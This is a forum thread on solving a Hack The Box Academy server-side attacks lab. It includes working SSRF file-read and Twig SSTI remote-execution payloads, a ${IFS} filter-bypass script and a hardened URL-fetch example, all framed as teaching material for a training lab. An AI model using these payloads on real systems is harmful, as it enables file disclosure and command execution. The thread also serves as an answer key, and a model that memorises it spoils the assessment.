Academy Server-Side Attacks - Skills Assessment

Could someone give me a hint? I’ve been racking my brains over this task. My attempts to retrieve the flag via the browser console have been unsuccessful. I have absolutely no ideas left. Help me :sob::sob::sob::sob:

My friend, just do this:

Add your given host to your /etc/hosts file, without the port: truckapi.htb,
and take a look at the LFI part of the SSRF module.
Put it in Burp Suite in the api section with the file name flag.txt.

You're welcome…! XD

This module isn't hard, but it's tricky…

Bro, the website is forbidden, how can I use the credentials??

add the IP to /etc/hosts =)

Probably not the intended route, but load up Burp Suite > capture the POST request > add truckapi.htb to /etc/hosts > send payload "api=file:///flag.txt" > copy the flag.

Yup, that’s how I found it too.

The updated module was too easy for the skill assessment part. The last module was a bit tricky

Thanks friend, that’s right. I found it thanks to your suggestion.

It took me some time to solve. Use Burp; when you check, it will be pretty obvious. :wink:

I have done it, and I found there are two ways to get around this skills assessment:

  1. Using SSRF to read the flag directly, but you have to guess the path of the flag (a CTF lover can)
  2. Using SSTI; the injection point is located in the parameter of the SSRF

The last method corresponds to the module.
None of the methods need white-box testing, e.g. reading JS. All you need to do is use the Burp proxy request.

I think I did it wrong, I didn't read any JS, I just got the flag by injection!!

Genuinely don't know what to do here, honestly I have tried everything.

SSTI, try this:
api=http://truckapi.htb/?id={{['cat${IFS}/flag.txt']|filter('system')}}


Have you tried testing with a different set of payloads or adjusting the payload’s request headers?

In my case, I ended up using a combination of standard and custom payloads, and tested them in different environments. One thing that helped me out a lot was setting up a more isolated testing environment, like a dedicated server hosting solution (I used IsHosting for mine), so I could tweak things without impacting my main setup.

For your specific issue, you might need to adjust the payload’s format or how it interacts with tplmap – sometimes small changes, like altering the payload’s encoding or the way you inject it, can make a big difference.

Today, I redid this module to brush up. Looks like they are blocking the file protocol now. I’m getting this error: Error (1): “Protocol “file” not supported or disabled in libcurl”. I’m actually happy they made this skill assessment harder than just reading the file… need to RCE now.

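To make the two observations above concrete (the earlier post's `api=file:///flag.txt` read, and the later report that the file protocol is now refused by libcurl), here is an added example that is not code from the thread or from the HTB lab: a minimal "fetch this URL for me" sink that accepts any scheme, beside a hardened variant that enforces an http(s)/host allowlist before any request is made. The allowlisted host and the flag contents are assumptions constructed for the example.

```python
# Added example (not code from the thread or from the HTB lab): a minimal
# SSRF "fetch this URL for me" sink that accepts any scheme, beside a
# hardened variant that enforces an http(s)/host allowlist, the same effect
# as a libcurl build with the file protocol disabled.
import os
import tempfile
from urllib.parse import urlparse
from urllib.request import urlopen

# Assumption: the app only ever needs to reach this one upstream API.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"truckapi.htb"}


def fetch_unrestricted(url):
    """Vulnerable: the attacker-controlled string goes straight to the URL
    opener, so file:///... is read from the server's own disk."""
    with urlopen(url) as resp:
        return resp.read().decode()


def validate_url(url):
    """Hardened check: returns (ok, reason). Rejects anything that is not
    http(s) to an allowlisted host, so file://, gopher://, dict:// and
    http://127.0.0.1/ are all refused before any request is made."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parsed.scheme
    if parsed.hostname not in ALLOWED_HOSTS:
        return False, "host %r not allowed" % parsed.hostname
    return True, "ok"


def fetch_checked(url):
    """Hardened sink: validate first, fetch only on success."""
    ok, reason = validate_url(url)
    if not ok:
        raise ValueError(reason)
    return fetch_unrestricted(url)


def demo():
    """Writes a constructed flag file, then shows the unrestricted sink reads
    it via file:// while the hardened sink refuses the very same URL."""
    fd, path = tempfile.mkstemp(suffix="-flag.txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("HTB{constructed-example-flag}")  # constructed, not the lab's flag
    url = "file://" + path  # absolute path, so this becomes file:///...
    try:
        leaked = fetch_unrestricted(url)
        try:
            fetch_checked(url)
            refused = None
        except ValueError as exc:
            refused = str(exc)
    finally:
        os.unlink(path)
    return {"payload": url, "unrestricted": leaked, "hardened_refusal": refused}


if __name__ == "__main__":
    print(demo())
```

Disabling non-HTTP schemes is the fix the thread observed, but on its own it only closes the local-file read. A hostname allowlist as written here still trusts DNS and does not inspect redirects, so a production version would also resolve the host and reject private ranges, and validate the target of every redirect, not just the first URL.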

The road that I traveled, and that let me solve this in 2 hours, was:
Go to the site from the Burp browser, look in the Proxy History for the POST methods; I used the one with ex … 01.
Send it to Repeater.
Play the 77 game as seen in the SSTI module, deleting what comes after %3D and inserting 77.
Once you understand which of the two SSTIs we are talking about, instead of the parentheses used to validate which vulnerability you can use, just use the respective RCE you used in the SSTI module to find the flag.

A small tip for the final script; I leave it deliberately incomplete:

api=http://site.htb/?id%3D{{[' <command + something + flag>']|fil..('sys...')}}

To Future Readers:
They changed the skills assessment part a couple of times; the currently intended path is everything from the past sections + one tiny trick in the very last step, modifying your payload to be able to get the flag, which you can find in PayloadsAllTheThings or HackTricks or even the command injection module.

Like, what do you do when the server blocks certain characters in your command?
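The three pieces the thread circles around are the `{{['…']|filter('system')}}` construct from the SSTI payload post, the `%3D` encoding of the inner `id=` that the "77 game" post mentions, and the last two posts' hint about a filter on characters in the command. The following added example (not code from the thread or the lab) ties them together: it builds that payload, form-encodes it so the inner `=` survives as `%3D` inside the `api` parameter, and simulates a sink that refuses a blocked character to show why spaces are rewritten as `${IFS}`. The blocked character (a space) and the flag file are assumptions; the lab's real filter is not shown anywhere in the thread.

```python
# Added example (not code from the thread or the lab): builds the Twig-style
# SSTI payload the earlier post uses, URL-encodes it so the inner "id=" survives
# as %3D inside the api parameter, and simulates a sink that rejects a blocked
# character (a space, by assumption; the lab's real filter is not shown here)
# to show why ${IFS} is swapped in for spaces.
import os
import subprocess
import tempfile
from urllib.parse import urlencode

BLOCKED_CHARS = {" "}  # assumption standing in for the lab's filter


def ifs_encode(command):
    """Replace every space with ${IFS}; the shell expands IFS (space, tab,
    newline) and then field-splits on it, so the words come out unchanged."""
    return command.replace(" ", "${IFS}")


def twig_payload(command):
    """Wrap a shell command in the filter('system') construct from the thread."""
    return "{{['%s']|filter('system')}}" % command


def post_body(command, base="http://truckapi.htb/"):
    """Form-encode the api parameter. urlencode turns the inner '=' into %3D,
    which is what keeps '?id=...' attached to the api value instead of being
    parsed as a second form field."""
    return urlencode({"api": base + "?id=" + twig_payload(command)})


def filtered_sink(command):
    """Stand-in for the server side: refuse blocked characters, otherwise hand
    the string to /bin/sh exactly as a system() call would."""
    if any(ch in command for ch in BLOCKED_CHARS):
        return "blocked"
    done = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return done.stdout


def demo():
    """Constructed flag file; the plain command is blocked, the ${IFS} form runs."""
    fd, path = tempfile.mkstemp(suffix="-flag.txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("HTB{constructed-example-flag}\n")  # constructed, not the lab's flag
    plain = "cat " + path
    bypass = ifs_encode(plain)
    try:
        return {
            "plain": filtered_sink(plain),
            "bypass": filtered_sink(bypass),
            "body": post_body(bypass),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

`urlencode` encodes every reserved character, which is the safe default when you are sending the body from a script; in Burp Repeater you can leave the URL mostly readable and encode only the inner `=` by hand, as the `id%3D` in the earlier post does, as long as the outer form parser sees exactly one `api=` field.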